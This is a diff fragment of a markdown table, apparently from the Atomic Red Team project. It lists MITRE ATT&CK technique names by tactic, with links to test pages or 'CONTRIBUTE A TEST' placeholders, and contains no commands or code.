-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Screen Capture](../../T1113/T1113.md) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Time Discovery](../../T1124/T1124.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1551.004/T1551.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1551/T1551.md) | | | | | | | |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Network Share Connection Removal](../../T1551.005/T1551.005.md) | | | | | | | |
-| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Startup Items](../../T1037.005/T1037.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Trap](../../T1546.005/T1546.005.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Startup Items](../../T1037.005/T1037.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Process Injection](../../T1055/T1055.md) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Service](../../T1543.003/T1543.003.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
-| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
-| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
